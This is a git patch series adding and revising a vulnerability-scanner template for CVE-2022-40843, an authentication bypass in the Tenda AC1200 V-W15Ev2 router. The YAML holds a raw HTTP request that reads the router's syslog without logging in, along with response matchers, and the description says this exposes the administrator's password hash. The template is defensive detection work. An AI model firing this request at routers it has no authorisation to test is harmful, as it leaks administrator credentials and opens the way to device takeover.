From acf1f64b63979aebf25a653a3ec6ff53234fe275 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Thu, 3 Nov 2022 09:01:10 +0900 Subject: [PATCH 1/5] Create CVE-2022-40843 The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. Signed-off-by: GwanYeong Kim --- cves/2022/CVE-2022-40843.yaml | 42 +++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2022/CVE-2022-40843.yaml diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml new file mode 100644 index 0000000000..447bcd2c80 --- /dev/null +++ b/cves/2022/CVE-2022-40843.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-40843 + +info: + name: Tenda AC1200 V-W15Ev2 - Authentication Bypass + author: gy741 + severity: critical + description: | + The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + reference: + - https://boschko.ca/tenda_ac1200_router/?fbclid=IwAR1HrDTSgvo-Ah_dxXMvf53y_SW5cukyzqbQZbc4f5gRSm-ntAlPskLVYEI + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2022-40843 + cwe-id: CWE-78 + tags: cve,cve2022,tenda,auth-bypass,router + +requests: + - raw: + - | + GET /goform/downloadSyslog/syslog.log HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 + Cookie: W15Ev2_user= + Connection: close + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Content-type: config/conf" + + - type: status + status: + - 200 + + - type: word + words: + - "0001" + - "0002" + condition: and From 947d3ce87f9a30e9bb973956a62852c1b27e1233 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 3 Nov 2022 23:31:09 +0530 Subject: [PATCH 2/5] Update CVE-2022-40843.yaml --- cves/2022/CVE-2022-40843.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml index 447bcd2c80..a4cf032c74 100644 --- a/cves/2022/CVE-2022-40843.yaml +++ b/cves/2022/CVE-2022-40843.yaml @@ -7,7 +7,7 @@ info: description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - - https://boschko.ca/tenda_ac1200_router/?fbclid=IwAR1HrDTSgvo-Ah_dxXMvf53y_SW5cukyzqbQZbc4f5gRSm-ntAlPskLVYEI + - https://boschko.ca/tenda_ac1200_router classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.9 @@ -26,6 +26,12 @@ requests: matchers-condition: and matchers: + - type: word + words: + - "0001" + - "0002" + condition: and + - type: word part: header words: @@ -34,9 +40,3 @@ requests: - type: status status: - 200 - - - type: word - words: - - "0001" - - "0002" - condition: and From 935906680da66320d97ec003cf8897ea34c8b124 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:43:38 +0530 Subject: [PATCH 3/5] updated matcher & info --- cves/2022/CVE-2022-40843.yaml | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/cves/2022/CVE-2022-40843.yaml b/cves/2022/CVE-2022-40843.yaml index a4cf032c74..dcf2f460a7 100644 --- a/cves/2022/CVE-2022-40843.yaml +++ b/cves/2022/CVE-2022-40843.yaml @@ -8,29 +8,36 @@ info: The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. reference: - https://boschko.ca/tenda_ac1200_router + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40843 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cve-id: CVE-2022-40843 - cwe-id: CWE-78 - tags: cve,cve2022,tenda,auth-bypass,router + cwe-id: CWE-287 + metadata: + max-request: 1 + tags: cve,cve2022,tenda,auth-bypass,router,iot requests: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36 Cookie: W15Ev2_user= - Connection: close matchers-condition: and matchers: + - type: regex + regex: + - '^0\d{3}$' + - type: word + part: body words: - - "0001" - - "0002" - condition: and + - "[system]" + - "[error]" + - "[wan1]" + condition: or - type: word part: header From 5698c2f45a55f567084ca1f4fa30471961d81f7a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:44:50 +0530 Subject: [PATCH 4/5] Rename cves/2022/CVE-2022-40843.yaml to http/cves/2022/CVE-2022-40843.yaml --- {cves => http/cves}/2022/CVE-2022-40843.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {cves => http/cves}/2022/CVE-2022-40843.yaml (100%) diff --git a/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml similarity index 100% rename from cves/2022/CVE-2022-40843.yaml rename to http/cves/2022/CVE-2022-40843.yaml From fab7db909a24c55ca89a7e4bd23354dc35be758e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 2 Aug 2023 10:00:36 +0530 Subject: [PATCH 5/5] http update --- http/cves/2022/CVE-2022-40843.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index dcf2f460a7..fef7fc5688 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -18,7 +18,7 @@ info: max-request: 1 tags: cve,cve2022,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /goform/downloadSyslog/syslog.log HTTP/1.1